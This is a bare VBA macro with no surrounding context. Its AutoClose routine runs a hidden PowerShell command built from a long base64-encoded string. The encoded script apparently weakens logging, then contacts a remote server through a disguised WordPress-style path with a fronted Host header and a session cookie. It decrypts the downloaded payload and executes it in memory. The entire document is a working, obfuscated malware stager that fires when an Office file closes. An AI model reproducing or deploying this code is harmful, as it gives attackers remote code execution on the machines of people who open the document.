Sub AutoClose()
	aum
End Sub

Public Function aum() As Variant
	Dim aSVYYHGevfG As String
	aSVYYHGevfG = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
	aSVYYHGevfG = aSVYYHGevfG + "BlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBp"
	aSVYYHGevfG = aSVYYHGevfG + "AG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAWwBTAH"
	aSVYYHGevfG = aSVYYHGevfG + "kAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAEUA"
	aSVYYHGevfG = aSVYYHGevfG + "dgBlAG4AdABpAG4AZwAuAEUAdgBlAG4AdABQAHIAbwB2AGkAZA"
	aSVYYHGevfG = aSVYYHGevfG + "BlAHIAXQAuAEcAZQB0AEYAaQBlAGwAZAAoACcAbQBfAGUAbgBh"
	aSVYYHGevfG = aSVYYHGevfG + "AGIAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABJAG"
	aSVYYHGevfG = aSVYYHGevfG + "4AcwB0AGEAbgBjAGUAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgA"
	aSVYYHGevfG = aSVYYHGevfG + "WwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVA"
	aSVYYHGevfG = aSVYYHGevfG + "B5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBt"
	aSVYYHGevfG = aSVYYHGevfG + "AGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFQAcgBhAG"
	aSVYYHGevfG = aSVYYHGevfG + "MAaQBuAGcALgBQAFMARQB0AHcATABvAGcAUAByAG8AdgBpAGQA"
	aSVYYHGevfG = aSVYYHGevfG + "ZQByACcAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACcAZQB0AHcAUA"
	aSVYYHGevfG = aSVYYHGevfG + "ByAG8AdgBpAGQAZQByACcALAAnAE4AbwBuAFAAdQBiAGwAaQBj"
	aSVYYHGevfG = aSVYYHGevfG + "ACwAUwB0AGEAdABpAGMAJwApAC4ARwBlAHQAVgBhAGwAdQBlAC"
	aSVYYHGevfG = aSVYYHGevfG + "gAJABuAHUAbABsACkALAAwACkAOwB9ADsAWwBTAHkAcwB0AGUA"
	aSVYYHGevfG = aSVYYHGevfG + "bQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQ"
	aSVYYHGevfG = aSVYYHGevfG + "BhAG4AYQBnAGUAcgBdADoAOgBFAHgAcABlAGMAdAAxADAAMABD"
	aSVYYHGevfG = aSVYYHGevfG + "AG8AbgB0AGkAbgB1AGUAPQAwADsAJABLAD0AWwBTAHkAcwB0AG"
	aSVYYHGevfG = aSVYYHGevfG + "UAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoA"
	aSVYYHGevfG = aSVYYHGevfG + "QQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwBJAHYAVg"
	aSVYYHGevfG = aSVYYHGevfG + "BeAFkAOgBGAHQAZgBDAFgAVAAsAD0AYQBBAE0APwBqACMANwBP"
	aSVYYHGevfG = aSVYYHGevfG + "AFEAcABdACYAcgB8AFsAWgB4AG4AJwApADsAJABSAD0AewAkAE"
	aSVYYHGevfG = aSVYYHGevfG + "QALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUA"
	aSVYYHGevfG = aSVYYHGevfG + "NQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJA"
	aSVYYHGevfG = aSVYYHGevfG + "BTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBu"
	aSVYYHGevfG = aSVYYHGevfG + "AHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbAC"
	aSVYYHGevfG = aSVYYHGevfG + "QASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsA"
	aSVYYHGevfG = aSVYYHGevfG + "JABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOw"
	aSVYYHGevfG = aSVYYHGevfG + "AkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7"
	aSVYYHGevfG = aSVYYHGevfG + "ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAE"
	aSVYYHGevfG = aSVYYHGevfG + "gAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMA"
	aSVYYHGevfG = aSVYYHGevfG + "WwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQ"
	aSVYYHGevfG = aSVYYHGevfG + "A2AF0AfQB9ADsAJAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0"
	aSVYYHGevfG = aSVYYHGevfG + "ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAG"
	aSVYYHGevfG = aSVYYHGevfG + "UAbgB0ADsAJABzAGUAcgA9ACQAKABbAFQAZQB4AHQALgBFAG4A"
	aSVYYHGevfG = aSVYYHGevfG + "YwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQ"
	aSVYYHGevfG = aSVYYHGevfG + "B0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6"
	aSVYYHGevfG = aSVYYHGevfG + "AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAG"
	aSVYYHGevfG = aSVYYHGevfG + "EAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEA"
	aSVYYHGevfG = aSVYYHGevfG + "eABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQw"
	aSVYYHGevfG = aSVYYHGevfG + "A0AEEATQBnAEEAeABBAEMANABBAE0AUQBBAHkAQQBEAGcAQQBP"
	aSVYYHGevfG = aSVYYHGevfG + "AGcAQQA0AEEARABBAEEAJwApACkAKQA7ACQAdAA9ACcALwB3AH"
	aSVYYHGevfG = aSVYYHGevfG + "AALQBjAG8AbgB0AGUAbgB0AC8AdABoAGUAbQBlAHMALwB3AHAA"
	aSVYYHGevfG = aSVYYHGevfG + "LQBmAHIAbwBuAHQALgBwAGgAcAAnADsAJAB3AGMALgBQAHIAbw"
	aSVYYHGevfG = aSVYYHGevfG + "B4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBS"
	aSVYYHGevfG = aSVYYHGevfG + "AGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAG"
	aSVYYHGevfG = aSVYYHGevfG + "IAUAByAG8AeAB5ADsAJAB3AGMALgBQAHIAbwB4AHkALgBDAHIA"
	aSVYYHGevfG = aSVYYHGevfG + "ZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQ"
	aSVYYHGevfG = aSVYYHGevfG + "AuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBo"
	aSVYYHGevfG = aSVYYHGevfG + "AGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAE"
	aSVYYHGevfG = aSVYYHGevfG + "MAcgBlAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQA"
	aSVYYHGevfG = aSVYYHGevfG + "OgBQAHIAbwB4AHkAIAA9ACAAJAB3AGMALgBQAHIAbwB4AHkAOw"
	aSVYYHGevfG = aSVYYHGevfG + "AkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAVQBz"
	aSVYYHGevfG = aSVYYHGevfG + "AGUAcgAtAEEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC"
	aSVYYHGevfG = aSVYYHGevfG + "8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4A"
	aSVYYHGevfG = aSVYYHGevfG + "MwA7ACAAVwBpAG4ANgA0ADsAIAB4ADYANAApACAAQQBwAHAAbA"
	aSVYYHGevfG = aSVYYHGevfG + "BlAFcAZQBiAEsAaQB0AC8ANQAzADcALgAzADYAIAAoAEsASABU"
	aSVYYHGevfG = aSVYYHGevfG + "AE0ATAAsACAAbABpAGsAZQAgAEcAZQBjAGsAbwApACAAQwBoAH"
	aSVYYHGevfG = aSVYYHGevfG + "IAbwBtAGUALwA3ADkALgAwAC4AMwA5ADQANQAuADgAOAAgAFMA"
	aSVYYHGevfG = aSVYYHGevfG + "YQBmAGEAcgBpAC8ANQAzADcALgAzADYAIgApADsAdAByAHkAew"
	aSVYYHGevfG = aSVYYHGevfG + "AkAGkAZwA9ACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0"
	aSVYYHGevfG = aSVYYHGevfG + "AGEAKAAkAHMAZQByACkAfQBjAGEAdABjAGgAewB9ADsAJAB3AG"
	aSVYYHGevfG = aSVYYHGevfG + "MALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEgAbwBzAHQA"
	aSVYYHGevfG = aSVYYHGevfG + "IgAsACIAdwBtAHcAaQBmAGIAYQBqAHgAeABiAGMAeABtAHUAYw"
	aSVYYHGevfG = aSVYYHGevfG + "B4AG0AbABjAC4AYwBvAG0AIgApADsAJAB3AGMALgBIAGUAYQBk"
	aSVYYHGevfG = aSVYYHGevfG + "AGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAH"
	aSVYYHGevfG = aSVYYHGevfG + "MAZQBzAHMAaQBvAG4APQA2ADIAMABOAEsANgAzAFUAZQBkAHkA"
	aSVYYHGevfG = aSVYYHGevfG + "dwBaAEMARgBwAE4AVQBBAG0AOQAwAE8AVwA0AHYARQAlADMARA"
	aSVYYHGevfG = aSVYYHGevfG + "AiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABv"
	aSVYYHGevfG = aSVYYHGevfG + "AGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAH"
	aSVYYHGevfG = aSVYYHGevfG + "YAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEA"
	aSVYYHGevfG = aSVYYHGevfG + "PQAkAGQAYQB0AGEAWwA0AC4ALgAoACQAZABhAHQAYQAuAGwAZQ"
	aSVYYHGevfG = aSVYYHGevfG + "BuAGcAdABoAC0AMQApAF0AOwAtAGoAbwBpAG4AWwBDAGgAYQBy"
	aSVYYHGevfG = aSVYYHGevfG + "AFsAXQBdACgAJgAgACQAUgAgACQAZABhAHQAYQAgACgAJABJAF"
	aSVYYHGevfG = aSVYYHGevfG + "YAKwAkAEsAKQApAHwASQBFAFgA"
	Set asd = CreateObject("WScript.Shell")
	asd.Run(aSVYYHGevfG)
End Function
